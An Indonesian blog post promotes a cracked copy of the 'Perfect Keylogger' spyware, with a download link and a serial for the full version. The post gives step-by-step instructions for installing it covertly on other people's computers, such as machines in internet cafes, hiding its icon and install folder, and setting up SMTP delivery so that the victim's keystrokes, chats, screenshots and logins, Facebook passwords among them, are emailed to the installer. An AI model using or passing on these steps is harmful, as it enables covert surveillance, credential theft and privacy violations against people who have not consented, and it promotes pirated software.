Keylogger Terbaik 2010-2011

Keylogger Terbaik 2011 - Fungsi atau kegunaan dari keylogger ini bisa untuk merekam kegiatan komputer, merekam keyboard, merekam desktop, aktifitas mouse, sekaligus merekam waktu kamu browsing. Keylogger yang akan saya kasih adalah keylogger tebaik, free download dan serial nya biar menjadi full version. Ingat! bisa untuk mengetahui kegiatan browsing?? wah jadi ingat facebook dong...upz, email dan password facebook ku keliatan gak neh...
penasaran? cekidot untuk kuliah materi lebih dalam lagi.

Software keylogger ini namanya Perfect Keylogger keluaran dari Blazing Tools. Menurut Zatyabajaitem, keylogger ini yang paling baik, tidak terdeteksi oleh antivirus, mudah digunakan dan tidak ribet, bisa digunakan untuk OS windows XP, vista, dan windows 7.

Fitur dari Perfect Keylogger ini:
1. Bisa mendeteksi aktifitas berdasarkan kalendar
2. Keystrokes, yang fungsinya merekam ketikan keyboard dan browser yang kamu masuki. contoh waktu login di facebook.
3. Chat, yang fungsinya merekam segala ketikan kamu waktu chatting, maupun ketikan waktu tugas kantor word.
4. Screenshots, fungsinya merekam aktifitas komputer kamu di desktop dalam format gambar.
5. Website, fungsinya merekam segala link website yang kamu masuki.
6. Kamu bisa setting, agar icon keylogger hilang tidak kelihatan (klik hide program icon), dan icon keylogger pun akan tidak kelihatan di toolbar kanan bawah desktop kamu.
Dan untuk memunculkan kembali iconnya, tekan tombol ctrl + alt + L
7. Keylogger ini bisa kamu beri password untuk keamanannya.

Cara menginstall Perfect Keylogger:
1. Klik master programnya
2. Folder install Perfect Keylogger yang akan disimpan di partisi C program files bisa kamu beri nama sesuka kamu (untuk cari aman).
3. Jika sudah terinstall, masukan product key serialnya.
4. Dan akan muncul icon keylogger di toolbar kanan bawah desktop kamu.
5. Klik kanan mouse pada icon keylogger tersebut untuk mensetting nya, klik option.


Dan yang terpenting, bisa merekam kegiatan komputer orang lain dari jarak jauh, biasanya dipasang di warnet-warnet neh sama orang usil, dengan cara delivery via email. Jadi, semua kegiatan komputer orang lain tersebut akan dikirim ke email kamu. Tentu saja kedua pihak harus sama-sama memakai koneksi internet. hehe..

CARANYA:
1. Install program Perfect Keylogger ini di komputer target, dan kalo bisa dihidden seminimalis mungkin hasil program instalan kamu. (tujuannya cari aman )
2. Jika sudah terinstall dan tersetting dengan baik, klik kanan pada icon keylogger kanan bawah desktop.
3. Lalu klik option, dan akan muncul beberapa pilihan, pilih E-Mail.
4. Akan ada 2 konten, scheduler dan delivery.
5. Pada bagian scheduler, centang kotak pada "Try to send logs by email every"
6. Dan pada pilihan Delivery, pada bagian "send to" masukan alamat email kamu untuk menerima kiriman emailnya dari komputer target.
7. Untuk SMTP server, masukan SMTP provider dari email kamu.
PENTING! untuk mengaktifkan SMTP, Tentu saja harus diaktifin dulu fiturnya dari akun email mu sendiri. Dan saya rekomendasikan memakai yahoo saja, dengan akun email embel-embel belakangnya co.id, jangan memakai yang .com!!

Contoh: bagi pengguna provider yahoo, biasanya servernya "smtp.mail.yahoo.co.id"

8. Biarkan port numbernya tetap 25.
9. User name dan password masukan. User name dan password didapat sewaktu kamu mengaktifkan SMTP di yahoo kamu.
10. Authentication Method pilih AUTH LOGIN.
11. Klik ok, dan untuk mencoba nya klik send.

nih gan langsung aja sedot ya :
http://www.ziddu.com/download/11441154/BlazingTools.Perfect.Keylogger.v1.7.5.0.rar.html
Keylogger Terbaik 2010-2011 Keylogger Terbaik 2010-2011 Reviewed by Mars van Leunheuwk on 6:13:00 PM Rating: 5

2 comments

  1. gan link download nya dah di deleted ya ap ni tolong agan upload lagi ya....

    ReplyDelete
  2. upload lagi lah gan azzzz

    ReplyDelete

Catatan :

Terima Kasih atas kunjungan anda, merupakan suatu kehormatan bagi kami. Silahkan berikan komentar anda sesuai dengan aturan yang tercantum di bawah, insya Allah akan kami tanggapi.

Aturan Berkomentar :
1. Komentar yang mengandung SPAM, pornografi dan iklan akan dihapus.
2. Mencantumkan link hidup akan otomatis dihapus.
3. Anda bisa mendapatkan back link dengan berkomentar sebagai Nama/URL.
4. Komentar dari Anonymous dianggap spam dan tidak akan di tanggapi.
5. Gunakan bahasa yang baku
6. Saya akan secepatnya menjawab komentar yang sifatnya pertanyaan
7. Berkomentarlah yang baik dan sesuai dengan pembahasan

Khusus untuk membalas komentar disarankan menggunakan tombol balas di samping komentar terkait dibandingkan menggunakan formulir komentar di bawah agar komunikasi lebih terstruktur. Karena mungkin, apa yang Anda tanyakan/katakan saat ini akan sangat bermanfaat bagi pembaca lain.

NB: Jangan menuliskan link aktif karena akan terhapus secara automatis.

Post AD

expired